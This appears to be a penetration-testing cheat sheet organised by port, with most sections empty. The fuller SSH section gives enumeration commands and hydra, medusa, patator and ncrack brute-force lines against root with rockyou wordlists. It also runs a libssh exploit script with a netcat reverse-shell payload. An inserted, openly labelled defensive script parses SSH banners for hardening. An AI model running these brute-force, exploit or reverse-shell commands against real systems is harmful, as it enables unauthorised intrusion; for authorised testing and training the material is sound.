Ports
General
AIO Penetration Testing Methodology - 0DAYsecurity.com
Port 21 - FTP
nmap --script ftp-* -p 21 10.11.1.111
Port 22 - SSH
If you have usernames test login with username:username
OpenSSH versions below 7.7 are vulnerable to username enumeration.
# Enum SSH
# Get version
nmap 10.11.1.1 -p22 -sV
# Get banner
nc 10.11.1.1 22
# Get login banner
ssh user@10.11.1.1
# Get supported algorithms
nmap -p22 10.11.1.1 --script ssh2-enum-algos
# Check weak keys
nmap -p22 10.2.1.1 --script ssh-hostkey --script-args ssh_hostkey=full
# Check auth methods
nmap -p22 10.11.1.1 --script ssh-auth-methods --script-args="ssh.user=admin"
# The client can ask to execute a command right after authentication, before the user's default command or shell is started
$ ssh -v user@10.10.1.111 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 10.10.1.111 ([10.10.1.111]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(user) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0
# Check Auth Methods:
$ ssh -v 10.10.1.111
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
# Force Auth Method:
$ ssh -v 10.10.1.111 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
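As an added defender-side example (not part of the original notes), this Python script parses the two artefacts shown above, the SSH banner and the "Authentications that can continue" line from `ssh -v`, and flags the pre-7.7 OpenSSH user-enumeration exposure and any password-based auth methods for hardening. The sample banner and debug output are constructed, not captured from a real host.

```python
import re

# Constructed sample inputs (not captured from any real host): an SSH banner
# as returned by `nc host 22`, and a fragment of `ssh -v` client output.
SAMPLE_BANNER = "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7"
SAMPLE_SSH_V = """\
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.4p1 Debian-10+deb9u7
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Next authentication method: publickey
"""

BANNER_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)")
AUTH_RE = re.compile(r"Authentications that can continue: ([\w,-]+)")


def openssh_version(text):
    """Return (major, minor) of the first OpenSSH version string in text, or None."""
    m = BANNER_RE.search(text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def user_enum_exposed(text):
    """True when the banner advertises OpenSSH older than 7.7 (the cut-off in the notes)."""
    v = openssh_version(text)
    return v is not None and v < (7, 7)


def offered_auth_methods(ssh_v_output):
    """Parse the methods the server offers from `ssh -v` debug output."""
    m = AUTH_RE.search(ssh_v_output)
    return m.group(1).split(",") if m else []


def audit(banner, ssh_v_output):
    """Hardening findings derived from the two checks above, in a fixed order."""
    findings = []
    if user_enum_exposed(banner):
        findings.append("openssh-pre-7.7-user-enum")
    methods = offered_auth_methods(ssh_v_output)
    for weak in ("password", "keyboard-interactive"):
        if weak in methods:
            findings.append(f"{weak}-auth-enabled")
    return findings


if __name__ == "__main__":
    print(audit(SAMPLE_BANNER, SAMPLE_SSH_V))
```

Feed it the real banner and `ssh -v` output of a host you administer to get a quick list of what to fix in sshd_config (disable password auth, upgrade OpenSSH).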
# BruteForce:
patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111
medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111
# LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access
# Id
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id
# Reverse
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f"
# SSH FUZZ
# https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt
# cpan Net::SSH2
./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user
use auxiliary/fuzzers/ssh/ssh_version_2
# SSH-AUDIT
# https://github.com/arthepsy/ssh-audit
# Enum users < 7.7:
# https://www.exploit-db.com/exploits/45233
https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.py
python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"
# SSH Leaks:
https://shhgit.darkport.co.uk/
# SSH bruteforce
# https://github.com/kitabisa/ssb
Port 23 - Telnet
Port 25 - SMTP
Port 43 - Whois
Port 53 - DNS
Port 69 - UDP - TFTP
Known vulnerabilities exist in tftp server versions 1.3, 1.4, 1.9, 2.1, and a few others.
Same checks as FTP Port 21.
Port 79 - Finger
Port 88 - Kerberos
Check Kerberos dedicated section
Port 110 - Pop3
Port 111 - Rpcbind
Port 135 - MSRPC
Some versions are vulnerable.
| Named pipe | Description | Service or process | Interface identifier |
|---|---|---|---|
| browser (ntsvcs alias) | browser interface (Computer Browser service) | Browser | 6bffd098-a112-3610-9833-012892020162 v0.0 |
| cert | ICertPassage interface (Certificate services) | certsrv.exe | 91ae6020-9e3c-11cf-8d7c-00aa00c091be v0.0 |
| Ctx_Winstation_API_Service | winstation_rpc interface | termsrv.exe | 5ca4a760-ebb1-11cf-8611-00a0245420ed v1.0 |
| DAV RPC SERVICE | davclntrpc interface (WebDAV client service) | WebClient | c8cb7687-e6d3-11d2-a958-00c04f682e16 v1.0 |
| eventlog (ntsvcs alias) | eventlog interface (Eventlog service) | Eventlog | 82273fdc-e32a-18c3-3f78-827929dc23ea v0.0 |
| HydraLsPipe | Terminal Server Licensing | lserver.exe | 3d267954-eeb7-11d1-b94e-00c04fa3080d v1.0 |
| keysvc | ICertProtect interface (Cryptographic services) | CryptSvc | 0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0 |
| llsrpc | llsrpc interface (Licensing Logging service) | llssrv.exe | 342cfd40-3c6c-11ce-a893-08002b2e9c6d v0.0 |
| msgsvc (ntsvcs alias) | msgsvcsend interface (Messenger service) | messenger | 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 |
| netdfs | netdfs interface (Distributed File System service) | Dfssvc | 4fc742e0-4a10-11cf-8273-00aa004ae673 v3.0 |
| netlogon (lsass alias) | netlogon interface (Net Logon service) | Netlogon | 12345678-1234-abcd-ef00-01234567cffb v1.0 |
| plugplay | pnp interface (Plug and Play Windows Vista service) | PlugPlay | 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0 |
| policyagent | PolicyAgent interface (IPSEC Policy Agent (Windows 2000)) | PolicyAgent | d335b8f6-cb31-11d0-b0f9-006097ba4e54 v1.5 |
| protected_storage | IPStoreProv interface (Protected Storage) | lsass.exe | c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0 |
| ROUTER | Remote Access | mprdim.dll | 8f09f000-b7ed-11ce-bbd2-00001a181cad v0.0 |
| SECLOGON | ISeclogon interface (Secondary logon service) | seclogon | 12b81e99-f207-4a4c-85d3-77b42f76fd14 v1.0 |
| SfcApi | sfcapi interface (Windows File Protection) | winlogon.exe | 83da7c00-e84f-11d2-9807-00c04f8ec850 v2.0 |
| srvsvc (ntsvcs alias) | srvsvc interface (Server service) | services.exe (w2k) or svchost.exe (wxp and w2k3) | 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 |
| svcctl (ntsvcs alias) | svcctl interface (Services control manager) | services.exe | 367aeb81-9844-35f1-ad32-98f038001003 v2.0 |
| trkwks | trkwks interface (Distributed Link Tracking Client) | Trkwks | 300f3532-38cc-11d0-a3f0-0020af6b0add v1.2 |
| W32TIME (ntsvcs alias) | w32time interface (Windows Time (Windows 2000 and XP)) | w32time | 8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1 |
| W32TIME_ALT | w32time interface (Windows Time (Windows Server 2003, Windows Vista)) | w32time | 8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1 |
| winreg | winreg interface (Remote registry service) | RemoteRegistry | 338cd001-2244-31f1-aaaa-900038001003 v1.0 |
| wkssvc (ntsvcs alias) | wkssvc interface (Workstation service) | services.exe (w2k) or svchost.exe (wxp and w2k3) | 6bffd098-a112-3610-9833-46c3f87e345a v1.0 |
Port 139/445 - SMB
Port 161/162 UDP - SNMP
Port 389,636 - LDAP
Check AD section and this LDAP guide
Port 443 - HTTPS
Read the actual SSL certificate to:
- find out the correct vhost to send GET requests to
- check whether the server clock is skewed
- collect any names that could be usernames for brute force/guessing.
Port 500 - ISAKMP IKE
Port 513 - Rlogin
Port 541 - FortiNet SSLVPN
Port 1433 - MSSQL
Port 1521 - Oracle
Port 2000 - Cisco sccp
Port 2049 - NFS
Port 2100 - Oracle XML DB
Default passwords:
https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
Port 3306 - MySQL
Port 3389 - RDP
Port 5432 - PostgreSQL
Port 5900 - VNC
Port 5984 - CouchDB
Port 5985 - WinRM
Port 6379 - Redis
Port 8172 - MsDeploy
Port 5601/9200
Port 27017-19/27080/28017 - MongoDB
Unknown ports
amap -d 10.11.1.111 8000
netcat: makes connections to ports. Can echo strings or give shells:
nc -nv 10.11.1.111 110
sfuzz: can connect to ports, UDP or TCP, refrain from closing a connection, using basic HTTP configurations
RCE ports
